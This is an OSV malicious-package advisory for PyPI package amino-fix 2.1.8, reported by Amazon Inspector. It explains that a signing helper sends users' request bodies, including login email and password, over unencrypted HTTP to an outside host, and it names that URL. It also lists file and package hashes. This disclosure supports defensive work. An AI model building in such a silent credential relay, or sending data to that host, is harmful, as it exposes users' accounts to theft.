MAL-2026-3686

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/amino-fix/MAL-2026-3686.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-3686

Published

2026-05-13T00:19:49Z

Modified

2026-06-15T03:00:55.097953687Z

Summary

Malicious code in amino-fix (PyPI)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (807db606fec148f1acf0e1ddb4ec2e0a68ba672bb8e5641f9eefd0d425f30a44)

The asyncfix subpackage's signature() helper in aminofix/asyncfix/lib/util/helpers.py (lines 22-25) does not compute the NDC-MSG-SIG locally. Instead, every JSON request body is sent as a query string to http://aminoed.uk.to/api/generator/ndc-msg-sig?data={data} over unencrypted HTTP. This helper is invoked by every authenticated endpoint of the library, including client.login(email, password) — the advertised primary function. As a result, any caller using the async API silently transmits the end-user's plaintext email and password (and all other request bodies) as URL query parameters to aminoed.uk.to, a free .uk.to subdomain unrelated to the real Amino service (service.narvii.com). This is a textbook silent-relay: a hardcoded third-party destination embedded in public API code that exfiltrates caller-supplied credentials without disclosure, over plaintext HTTP with no TLS. A secondary import-time version-check against pypi.org is benign (data-only, printed to stdout) and not a dropper, but is noted as an unrelated quality issue.

Database specific

{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-002585",
            "import_time": "2026-05-13T20:11:01.266429227Z",
            "sha256": "807db606fec148f1acf0e1ddb4ec2e0a68ba672bb8e5641f9eefd0d425f30a44",
            "source": "amazon-inspector",
            "modified_time": "2026-05-13T00:19:49Z",
            "versions": [
                "2.1.8"
            ]
        }
    ]
}

References

https://pypi.org/project/amino.fix/2.1.8/

Credits

- Amazon Inspector - FINDER
- - actran@amazon.com

Affected packages

PyPI / amino-fix

Package

Name: amino-fix; View open source insights on deps.dev
Purl: pkg:pypi/amino-fix

Affected ranges

Affected versions

2.*

2.1.8

Database specific

cwes

[
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    }
]

indicators

{
    "evidence_files": [
        {
            "path": "aminofix/asyncfix/lib/util/helpers.py",
            "sha256": "c93e662de27505e4f274e0980af9a399caf5cfe4b8557248abf3f3dc20084be3",
            "tlsh": "e42124e7b863b59113bc42b970184022fb7f9ae25fc81083b80d42b4372ac299a3547d"
        },
        {
            "path": "aminofix/__init__.py",
            "sha256": "47921dcff69216c8a6e6d862c23af503a7440106ce2634934c2f0deab737162c",
            "tlsh": "7101c023423fe733b13e8bcec0035034ab3358705f8fb0a266905abc37c22418759888"
        }
    ],
    "package_integrity": [
        {
            "filename": "amino.fix-2.1.8-py3-none-any.whl",
            "hashes": {
                "md5": "ddc4616e89ea830404293e8be3b3a90d",
                "blake2b_256": "9f5f0bcb8f9c9a042d2179c351e9e2068c6bb21e7fa5c306dad3cb1de73e9527",
                "sha256": "2a94934bcfa50d3b329a067233af995861151ee82df1ebc404c7e2612ae37030"
            }
        },
        {
            "filename": "amino.fix-2.1.8.tar.gz",
            "hashes": {
                "md5": "19171c7a733d0094eb04a7f6b360c4d8",
                "blake2b_256": "99d3e0ecdc4ceae60e65486f85fcb180f949bd435a79d8c43c11d20d251ff347",
                "sha256": "ba1c0691642164fa523bf2d11ff448af26e7869f195a69d4e9909346480348e7"
            }
        }
    ]
}

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/amino-fix/MAL-2026-3686.json"